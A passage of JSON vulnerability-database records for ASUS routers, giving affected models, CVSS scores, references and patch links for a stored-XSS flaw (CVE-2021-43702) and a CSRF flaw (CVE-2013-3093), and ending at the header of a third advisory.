"scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac68uf", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi xd6", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1300g\\+", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac2200", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac66u\\+", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac56s", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax82u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1300uhp", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n12hp b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac85u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1200g", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "tuf gaming ax3000 v2", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac55uhp", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1750 b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n14uhp", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac68u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac3100", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi pro xt12", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac51u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi et8", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax92u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac66w", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax68u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax58u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax55", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac3200", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi xt9", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rog rapture gt-ac5300", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1750", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac68r", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax3000", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rog rapture gt-ax11000", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax89x", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi xd5", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi ax hybrid", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac52u b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1900", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n12\\+ b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1200g\\+", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n66w", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi ax mini", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1200e", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac2900", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac53", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac85p", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n19", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac68w", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1200gu", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac51u\\+", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ax88u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n12d1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac65p", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1900u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi ax", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "4g-ac68u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "zenwifi ac", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac57u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n18u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac68p", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac86u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac65u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac66u b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "4g-ac53u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac2600", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac87r", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-acrh17", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "tuf gaming ax5400", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n66r", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n12e b1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rog rapture gt-ac2900", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1200hp", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1900p", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac56r", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac88u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-ac1200", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-n66c1", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.386.46061" }, { "model": "rt-a88u 3.0.0.4.386 45898", "scope": null, "trust": 0.6, "vendor": "asus", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "NVD", "id": "CVE-2021-43702" } ] }, "cve": "CVE-2021-43702", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "exploitabilityScore": 6.8, "id": "CVE-2021-43702", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "LOW", "trust": 1.1, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CNVD-2022-58229", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.0, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.3, "id": "CVE-2021-43702", "impactScore": 6.0, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2021-43702", "trust": 1.0, "value": "CRITICAL" }, { "author": "CNVD", "id": "CNVD-2022-58229", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-202207-389", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULMON", "id": "CVE-2021-43702", "trust": 0.1, "value": "LOW" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "VULMON", "id": "CVE-2021-43702" }, { "db": "CNNVD", "id": "CNNVD-202207-389" }, { "db": "NVD", "id": "CVE-2021-43702" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-A88U 3.0.0.4.386_45898 is vulnerable to Cross Site Scripting (XSS). The ASUS router admin panel does not sanitize the WiFI logs correctly, if an attacker was able to change the SSID of the router with a custom payload, they could achieve stored XSS on the device. ASUS RT-A88U is a wireless router from ASUS (ASUS) in Taiwan", "sources": [ { "db": "NVD", "id": "CVE-2021-43702" }, { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "VULMON", "id": "CVE-2021-43702" } ], "trust": 1.53 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2021-43702", "trust": 2.3 }, { "db": "CNVD", "id": "CNVD-2022-58229", "trust": 0.6 }, { "db": "CNNVD", "id": "CNNVD-202207-389", "trust": 0.6 }, { "db": "VULMON", "id": "CVE-2021-43702", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "VULMON", "id": "CVE-2021-43702" }, { "db": "CNNVD", "id": "CNNVD-202207-389" }, { "db": "NVD", "id": "CVE-2021-43702" } ] }, "id": "VAR-202207-0160", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" } ], "trust": 1.2372652696875 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" } ] }, "last_update_date": "2024-08-14T15:27:14.485000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Patch for ASUS RT-A88U Cross-Site Scripting Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/345646" }, { "title": "ASUS RT-A88U Fixes for cross-site scripting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=200692" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "CNNVD", "id": "CNNVD-202207-389" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-79", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2021-43702" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "https://www.kroll.com/en/insights/publications/cyber/cve-2021-43702-from-discovery-to-patch" }, { "trust": 1.7, "url": "https://www.asus.com/uk/networking-iot-servers/wifi-routers/asus-wifi-routers/rt-ac88u/" }, { "trust": 0.6, "url": "https://cxsecurity.com/cveshow/cve-2021-43702/" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/79.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "VULMON", "id": "CVE-2021-43702" }, { "db": "CNNVD", "id": "CNNVD-202207-389" }, { "db": "NVD", "id": "CVE-2021-43702" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "VULMON", "id": "CVE-2021-43702" }, { "db": "CNNVD", "id": "CNNVD-202207-389" }, { "db": "NVD", "id": "CVE-2021-43702" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-08-16T00:00:00", "db": "CNVD", "id": "CNVD-2022-58229" }, { "date": "2022-07-05T00:00:00", "db": "VULMON", "id": "CVE-2021-43702" }, { "date": "2022-07-05T00:00:00", "db": "CNNVD", "id": "CNNVD-202207-389" }, { "date": "2022-07-05T12:15:07.830000", "db": "NVD", "id": "CVE-2021-43702" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-08-19T00:00:00", "db": "CNVD", "id": "CNVD-2022-58229" }, { "date": "2022-07-18T00:00:00", "db": "VULMON", "id": "CVE-2021-43702" }, { "date": "2022-07-29T00:00:00", "db": "CNNVD", "id": "CNNVD-202207-389" }, { "date": "2022-07-18T15:27:57.557000", "db": "NVD", "id": "CVE-2021-43702" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-202207-389" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-A88U Cross-Site Scripting Vulnerability", "sources": [ { "db": "CNVD", "id": "CNVD-2022-58229" }, { "db": "CNNVD", "id": "CNNVD-202207-389" } ], "trust": 1.2 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "XSS", "sources": [ { "db": "CNNVD", "id": "CNNVD-202207-389" } ], "trust": 0.6 } }
var-202001-0883
Vulnerability from variot
ASUS RT-N56U devices allow CSRF. ASUS RT-N56U The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202001-0883", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "rt-ac66u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_2050" }, { "model": "rt-n15u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_16" }, { "model": "dsl-n55u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_1397" }, { "model": "rt-n16", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_979" }, { "model": "rt-n53", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_311" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_979" }, { "model": "rt-n10u", "scope": "eq", "trust": 1.0, "vendor": "asus", "version": "3.0.0.4.374_168" }, { "model": "dsl-n55u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-ac66u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n10u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n15u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n16", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n53", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null }, { "model": "rt-n56u", "scope": null, "trust": 0.8, "vendor": "asustek computer", "version": null } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "NVD", "id": "CVE-2013-3093" } ] }, "cve": "CVE-2013-3093", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "CVE-2013-3093", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2013-3093", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 8.8, "baseSeverity": "High", "confidentialityImpact": "High", "exploitabilityScore": null, "id": "CVE-2013-3093", "impactScore": null, "integrityImpact": "High", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "Required", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-3093", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2013-3093", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-202001-1276", "trust": 0.6, "value": "HIGH" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "CNNVD", "id": "CNNVD-202001-1276" }, { "db": "NVD", "id": "CVE-2013-3093" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-N56U devices allow CSRF. ASUS RT-N56U The device contains a cross-site request forgery vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state", "sources": [ { "db": "NVD", "id": "CVE-2013-3093" }, { "db": "JVNDB", "id": "JVNDB-2013-007119" } ], "trust": 1.62 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-3093", "trust": 2.4 }, { "db": "JVNDB", "id": "JVNDB-2013-007119", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-202001-1276", "trust": 0.6 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "CNNVD", "id": "CNNVD-202001-1276" }, { "db": "NVD", "id": "CVE-2013-3093" } ] }, "id": "VAR-202001-0883", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.5950836471428572 }, "last_update_date": "2024-08-14T14:45:05.083000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top\u00a0Page", "trust": 0.8, "url": "https://www.asus.com/us/" }, { "title": "ASUS RT-N56U Fixes for cross-site request forgery vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=107622" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "CNNVD", "id": "CNNVD-202001-1276" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.0 }, { "problemtype": "Cross-site request forgery (CWE-352) [NVD Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "NVD", "id": "CVE-2013-3093" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "https://www.securityfocus.com/archive/1/531194" }, { "trust": 1.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-3093" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "CNNVD", "id": "CNNVD-202001-1276" }, { "db": "NVD", "id": "CVE-2013-3093" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "db": "CNNVD", "id": "CNNVD-202001-1276" }, { "db": "NVD", "id": "CVE-2013-3093" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "date": "2020-01-28T00:00:00", "db": "CNNVD", "id": "CNNVD-202001-1276" }, { "date": "2020-01-28T21:15:11.560000", "db": "NVD", "id": "CVE-2013-3093" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-02-14T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-007119" }, { "date": "2020-05-22T00:00:00", "db": "CNNVD", "id": "CNNVD-202001-1276" }, { "date": "2020-01-31T16:06:35.230000", "db": "NVD", "id": "CVE-2013-3093" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS\u00a0RT-N56U\u00a0 Cross-site request forgery vulnerability in devices", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-007119" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-202001-1276" } ], "trust": 0.6 } }
cve-2018-20333
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://starlabs.sg/advisories/18-20333/ | x_refsource_MISC |
